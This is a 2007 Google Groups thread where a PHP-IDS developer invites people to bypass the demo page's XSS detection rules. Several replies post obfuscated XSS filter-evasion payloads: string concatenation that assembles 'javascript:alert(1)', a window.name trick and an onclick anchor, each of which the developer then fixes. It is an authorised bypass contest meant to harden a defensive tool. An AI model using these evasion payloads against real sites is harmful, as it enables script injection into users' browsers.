Google Groups Home
Help | Sign in
Pleeeease hack us!
There are currently too many topics in this group that display first. To make this topic appear first, remove this option from another topic.
There was an error processing your request. Please try again.
flag
  Messages 1 - 25 of 214 - Collapse all   Newer >
The group you are posting to is a Usenet group. Messages posted to this group will make your email address visible to anyone on the Internet.
Your reply message has not been sent.
Your post was successful
Mario Heiderich  
View profile
 More options Aug 28 2007, 3:40 pm
From: Mario Heiderich <Mario.Heider...@googlemail.com>
Date: Tue, 28 Aug 2007 12:40:43 -0700
Local: Tues, Aug 28 2007 3:40 pm
Subject: Pleeeease hack us!
Hi!

After talking to Christian and SirDarckCat I decided to make this post
- even if it may sound a little bit provocative ;) We spend lots of
time with the rules and except from some details we are pretty content
with them.

So if you like and find some time give them a new try - anyone who
will manage to create an XSS on the demo page will be mentioned in the
next release notes and will (if wanted) get a dedicated interview on
the blog (SirDarckCat's  interview will appear the next days - he was
again quicker than light with some vectors mentioned in the release
post).

Allowed are the following browsers:
- Firefox 1.5+
- IE 6+
- Opera 9+
- Safari 2+
- Konqueror 3.5+

Any vector which will be able to create an alert/content change via JS
on the demo page counts - as long as a PoC of what form ever can be
provided. A similar contest will follow the next weeks for SQL
Injection.

Greetings and have fun!
.mario


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Giorgio Maone  
View profile
 More options Sep 4 2007, 11:02 am
From: Giorgio Maone <giorgio.ma...@gmail.com>
Date: Tue, 04 Sep 2007 15:02:01 -0000
Local: Tues, Sep 4 2007 11:02 am
Subject: Re: Pleeeease hack us!
    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Mario Heiderich  
View profile
 More options Sep 4 2007, 11:10 am
From: "Mario Heiderich" <mario.heider...@googlemail.com>
Date: Tue, 4 Sep 2007 17:10:02 +0200
Local: Tues, Sep 4 2007 11:10 am
Subject: Re: Pleeeease hack us!

Thanks Giorgio! Very classy ones again. *fixing*

2007/9/4, Giorgio Maone <giorgio.ma...@gmail.com>:

--
_______________________
php-ids.org

    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
MaierMan@web.de  
View profile
 More options Sep 5 2007, 3:16 pm
From: "Maier...@web.de" <Maier...@web.de>
Date: Wed, 05 Sep 2007 12:16:18 -0700
Local: Wed, Sep 5 2007 3:16 pm
Subject: Re: Pleeeease hack us!
Make Giorgios threesome a foursome.
obj[name]() works as well, giving access to all top level functions/
objects.
Low impact in general, but this might be combined with other things...

    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Mario Heiderich  
View profile
 More options Sep 5 2007, 3:33 pm
From: "Mario Heiderich" <mario.heider...@googlemail.com>
Date: Wed, 5 Sep 2007 21:33:55 +0200
Local: Wed, Sep 5 2007 3:33 pm
Subject: Re: Pleeeease hack us!

Hi MalerMan and welcome to the group!
Nice variation - I shouldn't have forgotten that ;) *fixed*

Sorry for being late with answers today - I caught a cold and had to dig
myself to a project although...

Greetings,
.mario

2007/9/5, Maier...@web.de <Maier...@web.de>:

> Make Giorgios threesome a foursome.
> obj[name]() works as well, giving access to all top level functions/
> objects.
> Low impact in general, but this might be combined with other things...

--
_______________________
php-ids.org

    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Gareth  
View profile
 More options Sep 6 2007, 5:03 am
From: Gareth <gazhe...@gmail.com>
Date: Thu, 06 Sep 2007 09:03:44 -0000
Local: Thurs, Sep 6 2007 5:03 am
Subject: Re: Pleeeease hack us!
s1=''+"jav"+'';s2=''+"ascri"+'';s3=''+"pt"+'';s4=''==''?':':
0;s5=''+"aler"+'';s6=''+"t"+'';s7=''==''?'(1)':
0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8

Told you string concatenation was tough :)

On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Gareth  
View profile
 More options Sep 6 2007, 6:55 am
From: Gareth <gazhe...@gmail.com>
Date: Thu, 06 Sep 2007 10:55:43 -0000
Local: Thurs, Sep 6 2007 6:55 am
Subject: Re: Pleeeease hack us!
This will also work with the window.name trick (on IE only onclick):-

URL=name

On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Gareth  
View profile
 More options Sep 6 2007, 10:48 am
From: Gareth <gazhe...@gmail.com>
Date: Thu, 06 Sep 2007 14:48:16 -0000
Local: Thurs, Sep 6 2007 10:48 am
Subject: Re: Pleeeease hack us!
Now this is a strange one:-
h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+'';s3=''+ 'pt'+'';s4=''==''?':':
0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)':
0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;

It should work cause I tested it locally however it doesn't seem to
execute on your site. I've no idea why, maybe some characters are
cause the onclick handler to produce invalid data. The code above get
pass your filters though,

Tested this is Firefox locally and it worked:-
<a
onclick="h1=''+'hr'+'';h2=''+'ef'+'';h3=h1+h2;s1=''+'jav'+'';s2=''+'ascri'+ '';s3=''+'pt'+'';s4=''==''?':':
0;s5=''+'aler'+'';s6=''+'t'+'';s7=''==''?'(1)':
0;s8=s1+s2+s3+s4+s5+s6+s7;p1=previousSibling;p1.nextSibling[h3]=s8;"
href="?test=test">Test</a>

On Aug 28, 8:40 pm, Mario Heiderich <Mario.Heider...@googlemail.com>
wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Mario Heiderich  
View profile
 More options Sep 7 2007, 11:54 am
From: "Mario Heiderich" <mario.heider...@googlemail.com>
Date: Fri, 7 Sep 2007 17:54:39 +0200
Local: Fri, Sep 7 2007 11:54 am
Subject: Re: Pleeeease hack us!

Yep - very nice and strange one indeed! But fixed. The concatenation
algorithm has received a recode - hope that will stop the next wave ;)

Greetings and thanks!
.mario

2007/9/6, Gareth <gazhe...@gmail.com>:

--
_______________________
php-ids.org

    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Gareth  
View profile
 More options Sep 7 2007, 12:30 pm
From: Gareth <gazhe...@gmail.com>
Date: Fri, 07 Sep 2007 09:30:39 -0700
Local: Fri, Sep 7 2007 12:30 pm
Subject: Re: Pleeeease hack us!
Cool Mario nice one, I'll look forward to hacking it again :)

I think I might have found 1 vector already

On Sep 7, 4:54 pm, "Mario Heiderich" <mario.heider...@googlemail.com>
wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Gareth  
View profile
 More options Sep 8 2007, 6:20 am
From: Gareth <gazhe...@gmail.com>
Date: Sat, 08 Sep 2007 03:20:48 -0700
Local: Sat, Sep 8 2007 6:20 am
Subject: Re: Pleeeease hack us!
s3=1==true&&':';s2=1==true&&'(1)';s1=1==true&&'javascript'+s3+'aler'+'t'+s2 ;URL=s1

On Sep 7, 5:30 pm, Gareth <gazhe...@gmail.com> wrote:


    Reply to author    Forward  
You must Sign in before you can post messages.
To post a message you must first join this group.
Please update your nickname on the subscription settings page before posting.
You do not have the permission required to post.
Mario Heiderich  
View profile
 More options Sep 8 2007, 9:58 am
From: Mario Heiderich <Mario.Heider...@googlemail.com>
Date: Sat, 08 Sep 2007 13:58:02 -0000
Local: Sat, Sep 8 2007 9:58 am
Subject: Re: Pleeeease hack us!
very cool and.. *fixed*

I sent you the questions, gareth. next would be kishor and giorgio if
you guys like to.

On Sep 8, 12:20 pm, Gareth <gazhe...@gmail.com> wrote: